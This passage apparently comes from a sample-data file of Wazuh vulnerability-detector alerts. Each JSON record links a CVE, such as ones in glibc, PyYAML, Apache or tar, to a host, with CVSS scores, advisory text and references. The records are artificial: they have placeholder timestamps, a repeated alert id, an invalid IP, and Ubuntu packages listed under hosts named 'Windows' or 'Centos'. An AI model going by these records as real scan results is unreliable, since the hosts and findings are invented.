grub-legacy-ec2","id":"23503","firedtimes":32,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"grub-legacy-ec2","source":"cloud-init","version":"19.4-33-gbb4131a2-0ubuntu1~16.04.1","architecture":"all","condition":"Package less or equal than 19.4"},"cvss":{"cvss2":{"vector":{"attack_vector":"local","access_complexity":"low","authentication":"none","confidentiality_impact":"partial","integrity_impact":"none","availability":"none"},"base_score":"2.100000"}},"cve":"CVE-2020-8631","title":"CVE-2020-8631 on Ubuntu 16.04 LTS (xenial) - low.","rationale":"cloud-init through 19.4 relies on Mersenne Twister for a random password, which makes it easier for attackers to predict passwords, because rand_str in cloudinit/util.py calls the random.choice function.","severity":"Low","published":"2020-02-05","updated":"2020-02-21","state":"Fixed","cwe_reference":"CWE-330","references":["http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00042.html","https://bugs.launchpad.net/ubuntu/+source/cloud-init/+bug/1860795","https://github.com/canonical/cloud-init/pull/204","https://lists.debian.org/debian-lts-announce/2020/02/msg00021.html","https://nvd.nist.gov/vuln/detail/CVE-2020-8631","http://people.canonical.com/~ubuntu-security/cve/2020/CVE-2020-8631.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8631"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":5,"description":"CVE-2020-1752 affects libc-bin","id":"23503","firedtimes":12,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"libc-bin","source":"glibc","version":"2.27-3ubuntu1","architecture":"amd64","condition":"Package less than 2.32.0"},"cvss":{"cvss2":{"vector":{"attack_vector":"local","access_complexity":"high","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"partial"},"base_score":"3.700000"}},"cve":"CVE-2020-1752","title":"CVE-2020-1752 on Ubuntu 18.04 LTS (bionic) - medium.","rationale":"A use-after-free vulnerability introduced in glibc upstream version 2.14 was found in the way the tilde expansion was carried out. Directory paths containing an initial tilde followed by a valid username were affected by this issue. A local attacker could exploit this flaw by creating a specially crafted path that, when processed by the glob function, would potentially lead to arbitrary code execution. This was fixed in version 2.32.","severity":"Low","published":"2020-04-30","updated":"2020-05-18","state":"Fixed","cwe_reference":"CWE-416","references":["https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752","https://security.netapp.com/advisory/ntap-20200511-0005/","https://sourceware.org/bugzilla/show_bug.cgi?id=25414","https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c","https://nvd.nist.gov/vuln/detail/CVE-2020-1752","http://people.canonical.com/~ubuntu-security/cve/2020/CVE-2020-1752.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752","https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=263e6175999bc7f5adb8b32fd12fcfae3f0bb05a;hp=37db4539dd8b5c098d9235249c5d2aedaa67d7d1"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":13,"description":"CVE-2019-9169 affects libc6","id":"23506","firedtimes":68,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"libc6","source":"glibc","version":"2.23-0ubuntu11","architecture":"amd64","condition":"Package less or equal than 2.29"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"partial"},"base_score":"7.500000"},"cvss3":{"vector":{"attack_vector":"network","access_complexity":"low","privileges_required":"none","user_interaction":"none","scope":"unchanged","confidentiality_impact":"high","integrity_impact":"high","availability":"high"},"base_score":"9.800000"}},"cve":"CVE-2019-9169","title":"CVE-2019-9169 on Ubuntu 16.04 LTS (xenial) - low.","rationale":"In the GNU C Library (aka glibc or libc6) through 2.29, proceed_next_node in posix/regexec.c has a heap-based buffer over-read via an attempted case-insensitive regular-expression match.","severity":"Critical","published":"2019-02-26","updated":"2019-04-16","state":"Fixed","cwe_reference":"CWE-125","bugzilla_references":["https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34140","https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34142","https://sourceware.org/bugzilla/show_bug.cgi?id=24114"],"references":["http://www.securityfocus.com/bid/107160","https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34140","https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34142","https://kc.mcafee.com/corporate/index?page=content&id=SB10278","https://security.netapp.com/advisory/ntap-20190315-0002/","https://sourceware.org/bugzilla/show_bug.cgi?id=24114","https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=583dd860d5b833037175247230a328f0050dbfe9","https://support.f5.com/csp/article/K54823184","https://nvd.nist.gov/vuln/detail/CVE-2019-9169","http://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-9169.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9169"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2020-1927 affects apache2-utils","id":"23504","firedtimes":193,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"apache2-utils","source":"apache2","version":"2.4.29-1ubuntu4.13","architecture":"amd64","condition":"Package unfixed"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"medium","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"none"},"base_score":"5.800000"}},"cve":"CVE-2020-1927","title":"CVE-2020-1927 on Ubuntu 18.04 LTS (bionic) - low.","rationale":"In Apache HTTP Server 2.4.0 to 2.4.41, redirects configured with mod_rewrite that were intended to be self-referential might be fooled by encoded newlines and redirect instead to an an unexpected URL within the request URL.","severity":"Medium","published":"2020-04-02","updated":"2020-04-03","state":"Unfixed","cwe_reference":"CWE-601","references":["http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00002.html","http://www.openwall.com/lists/oss-security/2020/04/03/1","http://www.openwall.com/lists/oss-security/2020/04/04/1","https://httpd.apache.org/security/vulnerabilities_24.html","https://lists.apache.org/thread.html/r10b853ea87dd150b0e76fda3f8254dfdb23dd05fa55596405b58478e@%3Ccvs.httpd.apache.org%3E","https://lists.apache.org/thread.html/r1719675306dfbeaceff3dc63ccad3de2d5615919ca3c13276948b9ac@%3Cdev.httpd.apache.org%3E","https://lists.apache.org/thread.html/r52a52fd60a258f5999a8fa5424b30d9fd795885f9ff4828d889cd201@%3Cdev.httpd.apache.org%3E","https://lists.apache.org/thread.html/r70ba652b79ba224b2cbc0a183078b3a49df783b419903e3dcf4d78c7@%3Ccvs.httpd.apache.org%3E","https://security.netapp.com/advisory/ntap-20200413-0002/","https://nvd.nist.gov/vuln/detail/CVE-2020-1927","http://people.canonical.com/~ubuntu-security/cve/2020/CVE-2020-1927.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1927","https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2020-1927"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2019-11727 affects thunderbird","id":"23504","firedtimes":312,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"thunderbird","version":"1:68.8.0+build2-0ubuntu0.16.04.2","architecture":"amd64","condition":"Package unfixed"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"none","integrity_impact":"partial","availability":"none"},"base_score":"5"},"cvss3":{"vector":{"attack_vector":"network","access_complexity":"low","privileges_required":"none","user_interaction":"none","scope":"unchanged","confidentiality_impact":"none","integrity_impact":"low","availability":"none"},"base_score":"5.300000"}},"cve":"CVE-2019-11727","title":"CVE-2019-11727 on Ubuntu 16.04 LTS (xenial) - medium.","rationale":"A vulnerability exists where it possible to force Network Security Services (NSS) to sign CertificateVerify with PKCS#1 v1.5 signatures when those are the only ones advertised by server in CertificateRequest in TLS 1.3. PKCS#1 v1.5 signatures should not be used for TLS 1.3 messages. This vulnerability affects Firefox < 68.","severity":"Medium","published":"2019-07-23","updated":"2019-07-30","state":"Unfixed","cwe_reference":"CWE-295","bugzilla_references":["https://bugzilla.mozilla.org/show_bug.cgi?id=1552208"],"references":["http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00009.html","http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00010.html","http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00011.html","http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00017.html","http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00006.html","https://access.redhat.com/errata/RHSA-2019:1951","https://bugzilla.mozilla.org/show_bug.cgi?id=1552208","https://security.gentoo.org/glsa/201908-12","https://www.mozilla.org/security/advisories/mfsa2019-21/","https://nvd.nist.gov/vuln/detail/CVE-2019-11727","http://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-11727.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11727","https://usn.ubuntu.com/usn/usn-4054-1","https://usn.ubuntu.com/usn/usn-4060-1","https://www.mozilla.org/en-US/security/advisories/mfsa2019-21/#CVE-2019-11727"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":10,"description":"CVE-2018-7738 affects mount","id":"23505","firedtimes":128,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"mount","source":"util-linux","version":"2.27.1-6ubuntu3.10","architecture":"amd64","condition":"Package less or equal than 2.31"},"cvss":{"cvss2":{"vector":{"attack_vector":"local","access_complexity":"low","authentication":"none","confidentiality_impact":"complete","integrity_impact":"complete","availability":"complete"},"base_score":"7.200000"},"cvss3":{"vector":{"attack_vector":"local","access_complexity":"low","privileges_required":"low","user_interaction":"none","scope":"unchanged","confidentiality_impact":"high","integrity_impact":"high","availability":"high"},"base_score":"7.800000"}},"cve":"CVE-2018-7738","title":"CVE-2018-7738 on Ubuntu 16.04 LTS (xenial) - negligible.","rationale":"In util-linux before 2.32-rc1, bash-completion/umount allows local users to gain privileges by embedding shell commands in a mountpoint name, which is mishandled during a umount command (within Bash) by a different user, as demonstrated by logging in as root and entering umount followed by a tab character for autocompletion.","severity":"High","published":"2018-03-07","updated":"2019-10-03","state":"Fixed","cwe_reference":"NVD-CWE-noinfo","bugzilla_references":["http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=892179","https://github.com/karelzak/util-linux/issues/539"],"references":["http://www.securityfocus.com/bid/103367","https://bugs.debian.org/892179","https://github.com/karelzak/util-linux/commit/75f03badd7ed9f1dd951863d75e756883d3acc55","https://github.com/karelzak/util-linux/issues/539","https://www.debian.org/security/2018/dsa-4134","https://nvd.nist.gov/vuln/detail/CVE-2018-7738","http://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-7738.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7738"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2018-20482 affects tar","id":"23504","firedtimes":88,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"tar","version":"1.29b-2ubuntu0.1","architecture":"amd64","condition":"Package less or equal than 1.30"},"cvss":{"cvss2":{"vector":{"attack_vector":"local","access_complexity":"medium","authentication":"none","confidentiality_impact":"none","integrity_impact":"none","availability":"partial"},"base_score":"1.900000"},"cvss3":{"vector":{"attack_vector":"local","access_complexity":"high","privileges_required":"low","user_interaction":"none","scope":"unchanged","confidentiality_impact":"none","integrity_impact":"none","availability":"high"},"base_score":"4.700000"}},"cve":"CVE-2018-20482","title":"CVE-2018-20482 on Ubuntu 18.04 LTS (bionic) - low.","rationale":"GNU Tar through 1.30, when --sparse is used, mishandles file shrinkage during read access, which allows local users to cause a denial of service (infinite read loop in sparse_dump_region in sparse.c) by modifying a file that is supposed to be archived by a different user's process (e.g., a system backup running as root).","severity":"Medium","published":"2018-12-26","updated":"2019-10-03","state":"Fixed","cwe_reference":"CWE-835","bugzilla_references":["http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=917377","https://bugzilla.redhat.com/show_bug.cgi?id=1662346"],"references":["http://git.savannah.gnu.org/cgit/tar.git/commit/?id=c15c42ccd1e2377945fd0414eca1a49294bff454","http://lists.gnu.org/archive/html/bug-tar/2018-12/msg00023.html","http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00077.html","http://www.securityfocus.com/bid/106354","https://lists.debian.org/debian-lts-announce/2018/12/msg00023.html","https://news.ycombinator.com/item?id=18745431","https://security.gentoo.org/glsa/201903-05","https://twitter.com/thatcks/status/1076166645708668928","https://utcc.utoronto.ca/~cks/space/blog/sysadmin/TarFindingTruncateBug","https://nvd.nist.gov/vuln/detail/CVE-2018-20482","http://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-20482.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20482"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":10,"description":"CVE-2020-1747 affects python3-yaml","id":"23505","firedtimes":44,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"python3-yaml","source":"pyyaml","version":"3.12-1build2","architecture":"amd64","condition":"Package less than 5.3.1"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"complete","integrity_impact":"complete","availability":"complete"},"base_score":"10"}},"cve":"CVE-2020-1747","title":"A vulnerability was discovered in the PyYAML library in versions before 5.3.1, where it is susceptible to arbitrary code execution when it processes untrusted YAML files through the full_load method or with the FullLoader loader. Applications that use the library to process untrusted input may be vulnerable to this flaw. An attacker could use this flaw to execute arbitrary code on the system by abusing the python/object/new constructor.","severity":"High","published":"2020-03-24","updated":"2020-05-11","state":"Fixed","cwe_reference":"CWE-20","references":["http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00017.html","http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00017.html","https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1747","https://github.com/yaml/pyyaml/pull/386","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/K5HEPD7LEVDPCITY5IMDYWXUMX37VFMY/","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WORRFHPQVAFKKXXWLSSW6XKUYLWM6CSH/","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZBJA3SGNJKCAYPSHOHWY3KBCWNM5NYK2/","https://nvd.nist.gov/vuln/detail/CVE-2020-1747"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2017-14988 affects libopenexr22","id":"23504","firedtimes":189,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"libopenexr22","source":"openexr","version":"2.2.0-11.1ubuntu1.2","architecture":"amd64","condition":"Package matches a vulnerable version"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"medium","authentication":"none","confidentiality_impact":"none","integrity_impact":"none","availability":"partial"},"base_score":"4.300000"},"cvss3":{"vector":{"attack_vector":"local","access_complexity":"low","privileges_required":"none","user_interaction":"required","scope":"unchanged","confidentiality_impact":"none","integrity_impact":"none","availability":"high"},"base_score":"5.500000"}},"cve":"CVE-2017-14988","title":"** DISPUTED ** Header::readfrom in IlmImf/ImfHeader.cpp in OpenEXR 2.2.0 allows remote attackers to cause a denial of service (excessive memory allocation) via a crafted file that is accessed with the ImfOpenInputFile function in IlmImf/ImfCRgbaFile.cpp. NOTE: The maintainer and multiple third parties believe that this vulnerability isn't valid.","severity":"Medium","published":"2017-10-03","updated":"2019-09-23","state":"Pending confirmation","cwe_reference":"CWE-400","references":["http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00063.html","https://github.com/openexr/openexr/issues/248","https://nvd.nist.gov/vuln/detail/CVE-2017-14988"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":5,"description":"CVE-2020-1752 affects libc-bin","id":"23503","firedtimes":12,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"libc-bin","source":"glibc","version":"2.27-3ubuntu1","architecture":"amd64","condition":"Package less than 2.32.0"},"cvss":{"cvss2":{"vector":{"attack_vector":"local","access_complexity":"high","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"partial"},"base_score":"3.700000"}},"cve":"CVE-2020-1752","title":"CVE-2020-1752 on Ubuntu 18.04 LTS (bionic) - medium.","rationale":"A use-after-free vulnerability introduced in glibc upstream version 2.14 was found in the way the tilde expansion was carried out. Directory paths containing an initial tilde followed by a valid username were affected by this issue. A local attacker could exploit this flaw by creating a specially crafted path that, when processed by the glob function, would potentially lead to arbitrary code execution. This was fixed in version 2.32.","severity":"Low","published":"2020-04-30","updated":"2020-05-18","state":"Fixed","cwe_reference":"CWE-416","references":["https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752","https://security.netapp.com/advisory/ntap-20200511-0005/","https://sourceware.org/bugzilla/show_bug.cgi?id=25414","https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c","https://nvd.nist.gov/vuln/detail/CVE-2020-1752","http://people.canonical.com/~ubuntu-security/cve/2020/CVE-2020-1752.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752","https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=263e6175999bc7f5adb8b32fd12fcfae3f0bb05a;hp=37db4539dd8b5c098d9235249c5d2aedaa67d7d1"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2019-11727 affects thunderbird","id":"23504","firedtimes":312,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"thunderbird","version":"1:68.8.0+build2-0ubuntu0.16.04.2","architecture":"amd64","condition":"Package unfixed"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"none","integrity_impact":"partial","availability":"none"},"base_score":"5"},"cvss3":{"vector":{"attack_vector":"network","access_complexity":"low","privileges_required":"none","user_interaction":"none","scope":"unchanged","confidentiality_impact":"none","integrity_impact":"low","availability":"none"},"base_score":"5.300000"}},"cve":"CVE-2019-11727","title":"CVE-2019-11727 on Ubuntu 16.04 LTS (xenial) - medium.","rationale":"A vulnerability exists where it possible to force Network Security Services (NSS) to sign CertificateVerify with PKCS#1 v1.5 signatures when those are the only ones advertised by server in CertificateRequest in TLS 1.3. PKCS#1 v1.5 signatures should not be used for TLS 1.3 messages. This vulnerability affects Firefox < 68.","severity":"Medium","published":"2019-07-23","updated":"2019-07-30","state":"Unfixed","cwe_reference":"CWE-295","bugzilla_references":["https://bugzilla.mozilla.org/show_bug.cgi?id=1552208"],"references":["http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00009.html","http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00010.html","http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00011.html","http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00017.html","http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00006.html","https://access.redhat.com/errata/RHSA-2019:1951","https://bugzilla.mozilla.org/show_bug.cgi?id=1552208","https://security.gentoo.org/glsa/201908-12","https://www.mozilla.org/security/advisories/mfsa2019-21/","https://nvd.nist.gov/vuln/detail/CVE-2019-11727","http://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-11727.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11727","https://usn.ubuntu.com/usn/usn-4054-1","https://usn.ubuntu.com/usn/usn-4060-1","https://www.mozilla.org/en-US/security/advisories/mfsa2019-21/#CVE-2019-11727"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":13,"description":"CVE-2016-7948 affects libxrandr2","id":"23506","firedtimes":84,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"libxrandr2","source":"libxrandr","version":"2:1.5.0-1","architecture":"amd64","condition":"Package less or equal than 1.5.0"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"partial"},"base_score":"7.500000"},"cvss3":{"vector":{"attack_vector":"network","access_complexity":"low","privileges_required":"none","user_interaction":"none","scope":"unchanged","confidentiality_impact":"high","integrity_impact":"high","availability":"high"},"base_score":"9.800000"}},"cve":"CVE-2016-7948","title":"CVE-2016-7948 on Ubuntu 16.04 LTS (xenial) - low.","rationale":"X.org libXrandr before 1.5.1 allows remote X servers to trigger out-of-bounds write operations by leveraging mishandling of reply data.","severity":"Critical","published":"2016-12-13","updated":"2017-07-01","state":"Fixed","cwe_reference":"CWE-787","references":["http://www.openwall.com/lists/oss-security/2016/10/04/2","http://www.openwall.com/lists/oss-security/2016/10/04/4","http://www.securityfocus.com/bid/93373","http://www.securitytracker.com/id/1036945","https://cgit.freedesktop.org/xorg/lib/libXrandr/commit/?id=a0df3e1c7728205e5c7650b2e6dce684139254a6","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/74FFOHWYIKQZTJLRJWDMJ4W3WYBELUUG/","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Y7662OZWCSTLRPKS6R3E4Y4M26BSVAAM/","https://lists.x.org/archives/xorg-announce/2016-October/002720.html","https://security.gentoo.org/glsa/201704-03","https://nvd.nist.gov/vuln/detail/CVE-2016-7948","http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-7948.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7948"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":5,"description":"CVE-2013-4235 affects passwd","id":"23503","firedtimes":21,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"passwd","source":"shadow","version":"1:4.5-1ubuntu2","architecture":"amd64","condition":"Package unfixed"},"cvss":{"cvss2":{"vector":{"attack_vector":"local","access_complexity":"medium","authentication":"none","confidentiality_impact":"none","integrity_impact":"partial","availability":"partial"},"base_score":"3.300000"}},"cve":"CVE-2013-4235","title":"CVE-2013-4235 on Ubuntu 18.04 LTS (bionic) - low.","rationale":"shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees","severity":"Low","published":"2019-12-03","updated":"2019-12-13","state":"Unfixed","cwe_reference":"CWE-367","bugzilla_references":["https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=778950","https://bugzilla.redhat.com/show_bug.cgi?id=884658"],"references":["https://access.redhat.com/security/cve/cve-2013-4235","https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235","https://security-tracker.debian.org/tracker/CVE-2013-4235","https://nvd.nist.gov/vuln/detail/CVE-2013-4235","http://people.canonical.com/~ubuntu-security/cve/2013/CVE-2013-4235.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":10,"description":"CVE-2020-1747 affects python3-yaml","id":"23505","firedtimes":44,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"python3-yaml","source":"pyyaml","version":"3.12-1build2","architecture":"amd64","condition":"Package less than 5.3.1"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"complete","integrity_impact":"complete","availability":"complete"},"base_score":"10"}},"cve":"CVE-2020-1747","title":"A vulnerability was discovered in the PyYAML library in versions before 5.3.1, where it is susceptible to arbitrary code execution when it processes untrusted YAML files through the full_load method or with the FullLoader loader. Applications that use the library to process untrusted input may be vulnerable to this flaw. An attacker could use this flaw to execute arbitrary code on the system by abusing the python/object/new 